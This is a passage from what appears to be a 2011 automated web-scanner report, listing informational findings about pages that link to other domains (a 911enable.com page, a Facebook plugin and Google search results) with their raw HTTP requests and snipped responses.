<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&amp;pagtype=allchandate" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article"><img alt="" src="http://nt0.ggpht.com/news/tbn/lBoaMOipaLcOtM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&amp;pagtype=allchandate" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&amp;pagtype=allchandate" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article"><img alt="" src="http://nt2.ggpht.com/news/tbn/HhlA3vFz1ZB6pM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article"><img alt="" src="http://nt2.ggpht.com/news/tbn/1jXqVRtQK7EMAM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article"><img alt="" src="http://nt3.ggpht.com/news/tbn/F5FjO7F-cP61qM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/aZJ7aWyfVQEr5M/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article"><img alt="" src="http://nt0.ggpht.com/news/tbn/ANo1n5tGttMYUM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/PQ-bGjxtzs5UNM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/kUf4A8oelEE3mM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article"><img alt="" src="http://nt1.ggpht.com/news/tbn/NccJbJ641jl0qM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article"><img alt="" src="http://nt3.ggpht.com/news/tbn/t5y84RQOceJuEM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" id=""><span class="titletext">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=i&amp;ned=us&amp;hl=en&amp;q=xss&amp;cf=i&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

18.14. http://www.911enable.com/business/contact_specialist.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/contact_specialist.php?provenance=empty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=r2burfmm6jqje8vo1bf8orrin2; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:16 GMT
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<img src="/images/topmenu_spacer.gif"/>
<a href="https://support.connexon.com">Support</a>
...[SNIP]...
</div>
<a href="http://www.e911buzz.com" onClick="javascript: pageTracker._trackPageview ('./blog/e911buzz.php');" target="_blank" title="Visit the 911 Enable E911 Blog"> <img style="margin-left:10px; margin-top:20px; margin-bottom:15px; border:none;" src="/images/e911buzz_blog.png" alt="911 Enable E911 Blog E911 Buzz Logo" title="Visit the 911 Enable E911 Blog" />
...[SNIP]...
<div id="scanalert"><a href="https://www.scanalert.com/RatingVerify?ref=www.911enable.com"><img width="115" height="32" src="//images.scanalert.com/meter/www.911enable.com/12.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." style="border:none;" /></a>
...[SNIP]...

18.15. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.job-search-engine.com/keyword/number-portability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.18.37
X-Cnection: close
Date: Thu, 12 May 2011 00:46:02 GMT
Content-Length: 7533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

18.16. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=scanmedios HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:37:54 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76634

<!doctype html> <head> <title>scanmedios - Google Search</title> <script>window.google={kEI:"8jnLTbDONuLL0QGwzvz4Bw",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,298
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=scanmedios&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZtSPSQmgh_oJ:www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network+scanmedios&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ip-adress.com/whois/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','2','','0CB8QFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:t3mVHetNSfIJ:www.ip-adress.com/whois/scanmedios.com+scanmedios&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://whois.domaintools.com/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','3','','0CCUQFjAC')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.xomreviews.com/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','4','','0CCsQFjAD')">Mediosone (www <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cmcaCnzxmXMJ:www.xomreviews.com/scanmedios.com+scanmedios&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.markosweb.com/www/scanmedios.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">www.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ie-MjeRtXT4J:www.markosweb.com/www/scanmedios.com/+scanmedios&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://content.scanmedios.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')">content.scanmedios.com/</a>
...[SNIP]...
<h3 class="r"><a href="http://forums.webproxytalk.com/2098-scanmedios.html" class=l onmousedown="return clk(this.href,'','','','7','','0CDoQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:C3zMO3GPqAYJ:forums.webproxytalk.com/2098-scanmedios.html+scanmedios&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://scanmedios.com.hypestat.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CEQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PqCG498sTLEJ:scanmedios.com.hypestat.com/+scanmedios&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.siteslike.com/similar/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','9','','0CEoQFjAI')">Sites Like <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GvlOlLFyyRIJ:www.siteslike.com/similar/scanmedios.com+scanmedios&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CE8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://foontic.net/www.scanmedios.com" class=l onmousedown="return clk(this.href,'','','','10','','0CFAQFjAJ')">www.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2PBAhcDj47MJ:foontic.net/www.scanmedios.com+scanmedios&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFUQIDAJ')">Cached</a>
...[SNIP]...

18.17. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:57 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81764

<!doctype html> <head> <title>number porting lnp - Google Search</title> <script>window.google={kEI:"TS3LTaDUOqXc0QGA0fSXCQ",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,2
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=number+porting+lnp&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Local_number_portability" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Local_number_portability#History" onmousedown="return clk(this.href,'','','','1','','0CCcQ0gIoADAA')">History</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Portability_schemes" onmousedown="return clk(this.href,'','','','1','','0CCgQ0gIoATAA')">Portability schemes</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Technical_issues" onmousedown="return clk(this.href,'','','','1','','0CCkQ0gIoAjAA')">Technical issues</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Portability_by_country" onmousedown="return clk(this.href,'','','','1','','0CCoQ0gIoAzAA')">Portability by country</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:d4Eb8aOz6OAJ:en.wikipedia.org/wiki/Local_number_portability+number+porting+lnp&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fcc.gov/cgb/NumberPortability/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQFjAB')"><em>
...[SNIP]...
<div class=osl><a href="http://www.fcc.gov/cib/consumerfacts/numbport.html" onmousedown="return clk(this.href,'','','','2','','0CDMQ0gIoADAB')">Your Telephone Number When You ...</a> - <a href="http://www.fcc.gov/cgb/NumberPortability/lnpwaiverpetitions.html" onmousedown="return clk(this.href,'','','','2','','0CDQQ0gIoATAB')">LNP Waiver Petitions &amp; Decisions</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:yIjYu4_V-NMJ:www.fcc.gov/cgb/NumberPortability/+number+porting+lnp&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDEQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')">Transfer your <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jOPjUbcq1MIJ:www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp+number+porting+lnp&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wirelessadvisor.com/wireless-local-number-portability" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Wireless <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QL8BYk-aK2gJ:www.wirelessadvisor.com/wireless-local-number-portability+number+porting+lnp&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.qwest.com/wholesale/pcat/lnp.html" class=l onmousedown="return clk(this.href,'','','','5','','0CEQQFjAE')">Qwest | Wholesale | Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:x6NviN5neVgJ:www.qwest.com/wholesale/pcat/lnp.html+number+porting+lnp&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEkQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.inphonex.com/services/local-number-portability.php" class=l onmousedown="return clk(this.href,'','','','6','','0CEsQFjAF')">InPhonex Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZYrUCwFnXw4J:www.inphonex.com/services/local-number-portability.php+number+porting+lnp&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFAQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.voip-info.org/index.php?content_id=4313" class=l onmousedown="return clk(this.href,'','','','7','','0CFIQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CFcQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ported.com/midlnp.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CFgQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AkKZNgpdNG8J:www.ported.com/midlnp.htm+number+porting+lnp&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.8x8.com/Resources/Learn/TransferringNumber.aspx" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')">VoIP Transfer <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WuKPOPqfSOsJ:www.8x8.com/Resources/Learn/TransferringNumber.aspx+number+porting+lnp&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.varphonex.com/services/local-number-portability.php" class=l onmousedown="return clk(this.href,'','','','10','','0CGYQFjAJ')">Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rQHXqJ79c8YJ:www.varphonex.com/services/local-number-portability.php+number+porting+lnp&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGsQIDAJ')">Cached</a>
...[SNIP]...

18.18. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=7&ved=0CFQQFjAG&url=http%3A%2F%2Fwww.virtual-phone-number.org%2Findex.php%3Ftitle%3DLocal_Number_Portability_(LNP)%26redirect%3Dno&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNFZvt6UMgHLMTLnnquQ4-rgdrUR2Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
